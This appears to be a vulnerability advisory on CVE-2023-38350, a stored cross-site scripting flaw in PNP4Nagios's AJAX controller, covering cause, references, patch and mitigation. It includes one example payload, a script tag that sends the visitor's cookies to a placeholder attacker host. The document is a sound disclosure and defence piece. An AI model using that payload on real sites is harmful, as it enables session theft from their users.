CVE-2023-38350: PNP4Nagios Stored Cross-Site Scripting (XSS) Vulnerability in AJAX Controller via Basket API and Filters

PNP4Nagios, a popular open-source plugin used for displaying performance data of Nagios monitoring system, is found to have a security vulnerability in its version .6.26 that could allow stored Cross-Site Scripting (XSS) attacks. This vulnerability, identified as CVE-2023-38350, is caused by insufficient input validation in the AJAX controller, which involves the basket API and filters.

Exploit Details

The stored XSS vulnerability affects the file ajax_controller.php within the PNP4Nagios application. Attackers can potentially exploit this vulnerability by injecting malicious JavaScript code through the basket API and filters, which would then be executed when other users visit the affected pages.

Here is a simple example of a malicious payload that could be injected into the basket API and filters:

<script>document.location='https://attacker.example.com/steal_cookie?cookie='+document.cookie</script>;

Upon successful injection, this payload would exfiltrate the user's cookies to the attacker's server, potentially compromising the user's session.

The vulnerability was disclosed by the PNP4Nagios project at the following references

- PNP4Nagios GitHub Repository: https://github.com/lingej/pnp4nagios
- Commit 81ebfc5: https://github.com/lingej/pnp4nagios/commit/81ebfc5847e1d39029d6d6014bfd894e977f8c60

Mitigation

To mitigate this vulnerability, it is recommended to apply the patch provided by PNP4Nagios, which can be found in commit 81ebfc5 on the GitHub repository.

Alternatively, input validation and output encoding should be implemented wherever user inputs are accepted and rendered back on the application pages. This will ensure that any malicious code injected in user inputs is sanitized before being stored or displayed on the pages.

Conclusion

Security vulnerabilities like the stored XSS in PNP4Nagios could lead to unauthorized access and control of sensitive data. It is crucial for organizations to ensure that their applications are regularly patched and updated to defend against such attacks. Furthermore, developers should make it a priority to follow secure coding practices and apply input validation and output encoding techniques in their applications.

Remember, a secure application is a strong application. Stay safe, stay protected!

Timeline

Published on: 07/15/2023 02:15:00 UTC
Last modified on: 07/26/2023 21:39:00 UTC